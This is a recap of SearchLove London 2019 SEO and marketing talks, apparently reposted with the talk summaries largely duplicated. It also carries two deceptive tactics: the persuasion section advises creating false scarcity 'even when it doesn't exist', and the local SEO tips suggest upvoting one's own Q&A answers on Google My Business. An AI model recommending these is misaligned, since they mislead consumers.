Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
0 notes
donnafmae · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.�� 
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
